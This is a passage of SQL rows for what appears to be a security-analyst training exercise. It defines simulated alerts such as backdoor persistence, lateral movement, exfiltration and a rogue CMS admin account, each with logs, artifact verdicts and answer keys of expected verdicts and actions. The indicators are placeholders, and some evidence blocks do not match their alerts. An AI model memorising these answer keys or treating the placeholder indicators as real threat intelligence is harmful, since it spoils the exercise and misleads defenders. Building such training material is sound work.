(478, 'Aria-body Backdoor Establishes Persistence', 'medium', 'System Logs', 'The Aria-body backdoor has been detected establishing persistence by creating a scheduled task. This ensures the malware runs at system startup, maintaining access on the compromised machine.', 'Persistence Mechanism', 'T1053.005 - Scheduled Task/Job', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:07Z\",\"event_id\":4698,\"task_name\":\"\\\\Microsoft\\\\Windows\\\\Update\\\\Aria-body\",\"task_action\":\"Create\",\"task_author\":\"SYSTEM\",\"task_trigger\":\"At startup\",\"executed_by\":\"192.168.1.15\",\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"aria-body.exe\",\"user\":\"compromised_user\",\"source_ip\":\"203.0.113.45\"}', '2026-01-05 03:08:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local IP address within the internal network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a variant of the Aria-body malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"aria-body.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"File associated with Aria-body backdoor malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"suspicious\",\"details\":\"User account 
potentially compromised and used for unauthorized activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.087Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:07Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\Aria-body\\\",\\\"task_action\\\":\\\"Create\\\",\\\"task_author\\\":\\\"SYSTEM\\\",\\\"task_trigger\\\":\\\"At startup\\\",\\\"executed_by\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"aria-body.exe\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.087Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:07Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\Aria-body\\\",\\\"task_action\\\":\\\"Create\\\",\\\"task_author\\\":\\\"SYSTEM\\\",\\\"task_trigger\\\":\\\"At startup\\\",\\\"executed_by\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"aria-body.exe\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.087Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:07Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\Aria-body\\\",\\\"task_action\\\":\\\"Create\\\",\\\"task_author\\\":\\\"SYSTEM\\\",\\\"task_trigger\\\":\\\"At startup\\\",\\\"executed_by\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"aria-body.exe\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.087Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:07Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\Aria-body\\\",\\\"task_action\\\":\\\"Create\\\",\\\"task_author\\\":\\\"SYSTEM\\\",\\\"task_trigger\\\":\\\"At startup\\\",\\\"executed_by\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"aria-body.exe\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.087Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:07Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\Aria-body\\\",\\\"task_action\\\":\\\"Create\\\",\\\"task_author\\\":\\\"SYSTEM\\\",\\\"task_trigger\\\":\\\"At startup\\\",\\\"executed_by\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"aria-body.exe\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 
100\"}}', 0),
(479, 'Lateral Movement Detected Across Internal Network', 'high', 'Network Traffic Analysis', 'Using stolen credentials, the attacker moves laterally within the network, targeting additional systems to widen their access and control. The attacker used RDP connections to access a critical server using the account j.doe.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-16T13:45:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.23\",\"protocol\":\"RDP\",\"username\":\"j.doe\",\"event\":\"Successful login\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"filename\":\"malicious.exe\"}', '2026-01-05 03:08:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal asset database\",\"verdict\":\"internal\",\"details\":\"Internal company server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal user database\",\"verdict\":\"suspicious\",\"details\":\"Account accessed from external IP\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware database\",\"verdict\":\"malicious\",\"details\":\"File associated with lateral movement 
activities\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(480, 'Data Exfiltration to Command and Control Server', 'high', 'Firewall Logs', 'Sensitive data has been exfiltrated from the internal network to an external command and control server. The attacker used a domain that mimics a legitimate regional government site to avoid detection. This activity is consistent with Naikon APT operations focused on espionage.', 'Data Exfiltration', 'T1041', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:37:22Z\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"203.0.113.56\",\"src_port\":45678,\"dst_port\":443,\"protocol\":\"TCP\",\"action\":\"ALLOW\",\"hostname\":\"internal-host.local\",\"domain\":\"gov-info-update.com\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"username\":\"jdoe\",\"filename\":\"confidential_report.pdf\",\"event_id\":\"FW-EXFIL-20231015-001\"}', '2026-01-05 03:08:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with Naikon APT.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"gov-info-update.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"domain_watch\",\"verdict\":\"suspicious\",\"details\":\"Domain mimics a legitimate government site, commonly used for phishing.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash associated with malicious exfiltration 
tool.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"File contains sensitive information and was involved in exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(481, 'Suspicious Login Detected', 'medium', 'CMS Security Logs', 'An unauthorized login attempt was detected on the news website\'s CMS. The user\'s credentials were likely harvested through a phishing email. The attempt was made from a known malicious IP address.', 'Initial Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-07T14:23:56Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.5\",\"username\":\"j.smith@newswebsite.com\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\",\"login_status\":\"failed\",\"reason\":\"invalid_credentials\",\"related_email\":\"phishing_campaign@maliciousdomain.com\",\"malicious_url\":\"http://maliciousdomain.com/login\",\"hash\":\"3c3f4d4e2b5c6d7e8f9a1b2c3d4e5f6a\"}', '2026-01-05 03:22:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"j.smith@newswebsite.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Registered CMS user.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"malicious\",\"details\":\"URL used in phishing campaigns to harvest credentials.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"phishing_campaign@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email address used for phishing 
campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3c3f4d4e2b5c6d7e8f9a1b2c3d4e5f6a\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential-stealing malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.089Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-07T14:23:56Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"j.smith@newswebsite.com\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\\\",\\\"login_status\\\":\\\"failed\\\",\\\"reason\\\":\\\"invalid_credentials\\\",\\\"related_email\\\":\\\"phishing_campaign@maliciousdomain.com\\\",\\\"malicious_url\\\":\\\"http://maliciousdomain.com/login\\\",\\\"hash\\\":\\\"3c3f4d4e2b5c6d7e8f9a1b2c3d4e5f6a\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.089Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-07T14:23:56Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"j.smith@newswebsite.com\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 
Safari/537.36\\\",\\\"login_status\\\":\\\"failed\\\",\\\"reason\\\":\\\"invalid_credentials\\\",\\\"related_email\\\":\\\"phishing_campaign@maliciousdomain.com\\\",\\\"malicious_url\\\":\\\"http://maliciousdomain.com/login\\\",\\\"hash\\\":\\\"3c3f4d4e2b5c6d7e8f9a1b2c3d4e5f6a\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.089Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-07T14:23:56Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"j.smith@newswebsite.com\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\\\",\\\"login_status\\\":\\\"failed\\\",\\\"reason\\\":\\\"invalid_credentials\\\",\\\"related_email\\\":\\\"phishing_campaign@maliciousdomain.com\\\",\\\"malicious_url\\\":\\\"http://maliciousdomain.com/login\\\",\\\"hash\\\":\\\"3c3f4d4e2b5c6d7e8f9a1b2c3d4e5f6a\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.089Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-07T14:23:56Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"j.smith@newswebsite.com\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 
Safari/537.36\\\",\\\"login_status\\\":\\\"failed\\\",\\\"reason\\\":\\\"invalid_credentials\\\",\\\"related_email\\\":\\\"phishing_campaign@maliciousdomain.com\\\",\\\"malicious_url\\\":\\\"http://maliciousdomain.com/login\\\",\\\"hash\\\":\\\"3c3f4d4e2b5c6d7e8f9a1b2c3d4e5f6a\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.089Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-07T14:23:56Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"j.smith@newswebsite.com\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\\\",\\\"login_status\\\":\\\"failed\\\",\\\"reason\\\":\\\"invalid_credentials\\\",\\\"related_email\\\":\\\"phishing_campaign@maliciousdomain.com\\\",\\\"malicious_url\\\":\\\"http://maliciousdomain.com/login\\\",\\\"hash\\\":\\\"3c3f4d4e2b5c6d7e8f9a1b2c3d4e5f6a\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(482, 'Unauthorized CMS Article Publication', 'high', 'Website Change Log', 'An unauthorized publication of articles detected on the CMS. Attackers utilized stolen credentials to disseminate false narratives aiming to influence public opinion through misinformation.', 'Execution', 'T1203 - Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T13:45:30Z\",\"event_id\":\"cms-2023-unauth-pub-002\",\"user\":\"compromised_editor\",\"ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.10.25\",\"modified_files\":[\"/var/www/cms/articles/fake-news-001.html\",\"/var/www/cms/articles/fake-news-002.html\"],\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action_taken\":\"Published\",\"timestamp_publish\":\"2023-10-15T13:44:55Z\"}', '2026-01-05 03:22:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous misinformation campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_editor\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Access Logs\",\"verdict\":\"internal\",\"details\":\"Username with elevated permissions used in unauthorized actions.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Empty file or common default hash, requires further investigation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.090Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:30Z\\\",\\\"event_id\\\":\\\"cms-2023-unauth-pub-002\\\",\\\"user\\\":\\\"compromised_editor\\\",\\\"ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.25\\\",\\\"modified_files\\\":[\\\"/var/www/cms/articles/fake-news-001.html\\\",\\\"/var/www/cms/articles/fake-news-002.html\\\"],\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action_taken\\\":\\\"Published\\\",\\\"timestamp_publish\\\":\\\"2023-10-15T13:44:55Z\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.090Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:30Z\\\",\\\"event_id\\\":\\\"cms-2023-unauth-pub-002\\\",\\\"user\\\":\\\"compromised_editor\\\",\\\"ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.25\\\",\\\"modified_files\\\":[\\\"/var/www/cms/articles/fake-news-001.html\\\",\\\"/var/www/cms/articles/fake-news-002.html\\\"],\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action_taken\\\":\\\"Published\\\",\\\"timestamp_publish\\\":\\\"2023-10-15T13:44:55Z\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.090Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:30Z\\\",\\\"event_id\\\":\\\"cms-2023-unauth-pub-002\\\",\\\"user\\\":\\\"compromised_editor\\\",\\\"ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.25\\\",\\\"modified_files\\\":[\\\"/var/www/cms/articles/fake-news-001.html\\\",\\\"/var/www/cms/articles/fake-news-002.html\\\"],\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action_taken\\\":\\\"Published\\\",\\\"timestamp_publish\\\":\\\"2023-10-15T13:44:55Z\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.090Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:30Z\\\",\\\"event_id\\\":\\\"cms-2023-unauth-pub-002\\\",\\\"user\\\":\\\"compromised_editor\\\",\\\"ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.25\\\",\\\"modified_files\\\":[\\\"/var/www/cms/articles/fake-news-001.html\\\",\\\"/var/www/cms/articles/fake-news-002.html\\\"],\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action_taken\\\":\\\"Published\\\",\\\"timestamp_publish\\\":\\\"2023-10-15T13:44:55Z\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.090Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:30Z\\\",\\\"event_id\\\":\\\"cms-2023-unauth-pub-002\\\",\\\"user\\\":\\\"compromised_editor\\\",\\\"ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.25\\\",\\\"modified_files\\\":[\\\"/var/www/cms/articles/fake-news-001.html\\\",\\\"/var/www/cms/articles/fake-news-002.html\\\"],\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action_taken\\\":\\\"Published\\\",\\\"timestamp_publish\\\":\\\"2023-10-15T13:44:55Z\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(483, 'Backdoor Account Creation', 'high', 'User Account Activity Report', 'An attacker has created a new user account with administrative privileges on the CMS to maintain persistent access.', 'Persistence', 'T1136: Create Account', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_type\":\"user_account_creation\",\"user\":\"adminuser1\",\"created_by\":\"attacker_account\",\"created_at\":\"2023-10-05T14:20:00Z\",\"ip_address\":\"192.168.1.25\",\"external_ip\":\"203.0.113.5\",\"new_account\":{\"username\":\"backdooradmin\",\"privileges\":\"administrator\",\"creation_method\":\"web_interface\"},\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"cms_user_mgmt.php\"}', '2026-01-05 03:22:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"backdooradmin\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Newly created account with admin privileges.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"clean\",\"details\":\"Common hash associated with empty files.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"cms_user_mgmt.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File related to user management in 
